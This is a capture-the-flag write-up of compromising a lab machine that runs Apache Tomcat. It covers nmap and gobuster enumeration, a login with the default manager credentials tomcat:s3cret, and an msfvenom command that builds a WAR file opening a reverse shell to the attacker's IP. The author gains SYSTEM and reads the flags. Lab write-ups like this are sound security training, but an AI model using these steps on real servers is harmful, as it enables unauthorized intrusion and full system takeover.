Nmap 7.70 scan initiated Sat Jul 6 13:24:49 2019 as: nmap -sV -sC -p 8080 -oN O-Detailed 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 6 13:25:05 2019 -- 1 IP address (1 host up) scanned in 15.85 seconds
Port 8080 was the default installation of the Apache Tomcat server. The server was last updated in May 2018, hence had no exploits in Searchsploit.
gobuster dir -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-medium -u http://10.10.10.95:8080
The manager one seemed interesting, and when I hit the URL it asked for credentials, I tried default tomcat credentials tomcat:s3cret and they worked.
User Own & Root Own
An option to deploy my own WAR file was available so I built up a reverse shell using msfvenom for the server.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=9999 -f war > shell.war
The shell was uploaded and once this URL is hit I got a reverse shell as NT Authority/System
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018 07:09 AM <DIR> .
06/19/2018 07:09 AM <DIR> ..
06/19/2018 07:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 27,598,893,056 bytes free
C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004d***
root.txt
04a8b***
Learning Outcome
Whenever you get a shell, check who you are before running around for enumerating the server. In this case it took me quite a while to understand that I was running as root since beginning of time.
